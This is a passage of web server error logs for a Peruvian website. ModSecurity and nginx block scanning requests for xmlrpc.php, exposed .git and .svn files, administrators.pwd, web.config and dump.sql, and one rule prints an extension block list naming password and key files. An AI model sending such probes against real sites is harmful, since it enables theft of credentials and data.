5.188.62.21:46650] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0C04GUnpbi0SE1xThYN3wAAANM"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:44:16.528473 2024] [:error] [pid 23339:tid 139714480764672] [client 5.188.62.21:46652] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0C04KzDIVvUZj_END-2gwAAAFI"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:50:11.102718 2024] [:error] [pid 23340:tid 139714489157376] [client 5.188.62.174:46952] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0C2Q03EDxWKQJnR9eEgjAAAAJE"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:50:48.286937 2024] [:error] [pid 23338:tid 139714522728192] [client 5.188.62.140:46980] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0C2aGrZPW3kUBUIpuYJWQAAAA0"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:52:10.657461 2024] [:error] [pid 23339:tid 139714438801152] [client 5.188.62.140:47060] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0C2uqzDIVvUZj_END-2nwAAAFc"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 11:57:10.206432 2024] [:error] [pid 23340:tid 139714447193856] [client 5.188.62.174:47304] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0C35k3EDxWKQJnR9eEgpQAAAJY"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 12:42:34.696990 2024] [:error] [pid 23340:tid 139714615047936] [client 5.188.62.174:49194] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DCik3EDxWKQJnR9eEhPQAAAII"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 12:43:40.787100 2024] [:error] [pid 23338:tid 139714480764672] [client 5.188.62.140:49254] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DCzGrZPW3kUBUIpuYJwgAAABI"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 12:47:24.571555 2024] [:error] [pid 23932:tid 139714564691712] [client 5.188.62.140:49408] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DDrGUnpbi0SE1xThYPLQAAAMg"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 12:48:26.437668 2024] [:error] [pid 23932:tid 139714489157376] [client 5.188.62.174:49456] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DD6mUnpbi0SE1xThYPOAAAANE"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 13:07:36.391989 2024] [:error] [pid 23340:tid 139714598262528] [client 5.188.62.174:50822] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DIaE3EDxWKQJnR9eEh1AAAAIQ"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 13:37:23.810804 2024] [:error] [pid 23932:tid 139714598262528] [client 5.188.62.140:52412] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DPY2Unpbi0SE1xThYREQAAAMQ"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 13:37:29.375451 2024] [:error] [pid 23932:tid 139714573084416] [client 5.188.62.174:52422] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DPaWUnpbi0SE1xThYRFAAAAMc"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 13:40:34.938130 2024] [:error] [pid 23340:tid 139714705200896] [client 5.188.62.174:52630] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DQIk3EDxWKQJnR9eEiggAAAIA"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 13:42:17.937660 2024] [:error] [pid 23338:tid 139714705200896] [client 5.188.62.140:52742] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DQiWrZPW3kUBUIpuYKmAAAAAA"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 14:38:31.094887 2024] [:error] [pid 23932:tid 139714564691712] [client 5.188.62.140:55090] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0Ddt2Unpbi0SE1xThYS4wAAAMg"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 14:40:35.214861 2024] [:error] [pid 23340:tid 139714505942784] [client 5.188.62.140:55168] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DeM03EDxWKQJnR9eEjmAAAAI8"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 15:31:24.306181 2024] [:error] [pid 23338:tid 139714514335488] [client 5.188.62.140:56160] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DqHGrZPW3kUBUIpuYLcQAAAA4"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 15:36:02.331503 2024] [:error] [pid 23932:tid 139714589869824] [client 5.188.62.140:56210] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0DrMmUnpbi0SE1xThYTgAAAAMU"], referer: https://investigacionperu.com/xmlrpc.php [Fri Nov 22 16:23:53.040662 2024] [:error] [pid 23932:tid 139714505942784] [client 5.188.62.140:57362] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0D2aWUnpbi0SE1xThYUAgAAAM8"], referer: https://investigacionperu.com/xmlrpc.php 2024/11/22 18:34:07 [error] 23204#23204: *67436 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/22 18:42:53 [error] 23204#23204: *67577 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/23 02:17:54 [error] 23205#23205: *74170 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/23 05:52:56 [error] 8070#8070: *80753 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/23 06:15:43 [error] 8069#8069: *81021 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Nov 23 06:21:05.498242 2024] [autoindex:error] [pid 8140:tid 140632681027328] [client 13.71.28.55:55596] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Nov 23 12:08:28.975509 2024] [:error] [pid 8244:tid 140632722990848] [client 154.26.133.94:35540] [client 154.26.133.94] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "14"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z0IMDD8SkQmwwNJzl1-lnwAAAMk"] [Sat Nov 23 17:04:55.639550 2024] [autoindex:error] [pid 8244:tid 140632739776256] [client 64.227.133.78:40806] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Nov 24 04:44:39.327170 2024] [authz_core:error] [pid 11575:tid 139842700625664] [client 139.59.231.238:49110] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/24 04:44:45 [error] 9947#9947: *93405 access forbidden by rule, client: 139.59.231.238, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Nov 24 09:13:10.150408 2024] [authz_core:error] [pid 11575:tid 139842949711616] [client 164.92.244.132:52888] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/24 09:13:14 [error] 9947#9947: *95902 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/24 15:29:47 [error] 9946#9946: *98628 access forbidden by rule, client: 45.148.10.237, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/25 00:47:09 [error] 9947#9947: *103105 access forbidden by rule, client: 165.227.39.235, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/25 00:47:10 [error] 9946#9946: *103178 access forbidden by rule, client: 165.22.34.189, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/25 00:47:11 [error] 9947#9947: *103214 access forbidden by rule, client: 134.209.25.199, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/25 00:47:12 [error] 9947#9947: *103249 access forbidden by rule, client: 147.182.200.94, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/25 00:47:15 [error] 9947#9947: *103318 access forbidden by rule, client: 68.183.9.16, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/25 00:47:24 [error] 9947#9947: *103372 access forbidden by rule, client: 128.199.182.55, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Nov 25 00:47:24.850058 2024] [authz_core:error] [pid 11575:tid 139842725803776] [client 157.245.204.205:37514] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Mon Nov 25 00:47:25.441353 2024] [authz_core:error] [pid 9983:tid 139842818123520] [client 146.190.103.103:37518] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/25 00:47:32 [error] 9946#9946: *103403 access forbidden by rule, client: 157.245.204.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/25 00:47:32 [error] 9947#9947: *103405 access forbidden by rule, client: 146.190.103.103, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/25 11:40:16 [error] 12406#12406: *110500 access forbidden by rule, client: 109.202.99.36, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/25 11:40:16 [error] 12407#12407: *110424 access forbidden by rule, client: 109.202.99.36, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/25 11:40:16 [error] 12407#12407: *110497 access forbidden by rule, client: 109.202.99.36, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/25 11:40:16 [error] 12407#12407: *110471 access forbidden by rule, client: 109.202.99.36, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/25 11:40:17 [error] 12407#12407: *110582 access forbidden by rule, client: 213.232.87.230, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Mon Nov 25 11:40:17.363701 2024] [:error] [pid 12548:tid 140440145696512] [client 213.232.87.230:49472] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z0Socd1vE4O_ZwLZLaN-kQAAAE4"] [Mon Nov 25 11:40:17.370879 2024] [:error] [pid 12548:tid 140440246408960] [client 213.232.87.230:49476] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "Z0Socd1vE4O_ZwLZLaN-kwAAAEI"] [Mon Nov 25 11:40:17.387437 2024] [:error] [pid 13152:tid 140440221230848] [client 213.232.87.230:49486] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "Z0SocUw_ksn7Ln2zK4XbjQAAAMU"] [Mon Nov 25 11:40:17.388714 2024] [:error] [pid 13152:tid 140440221230848] [client 213.232.87.230:49488] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 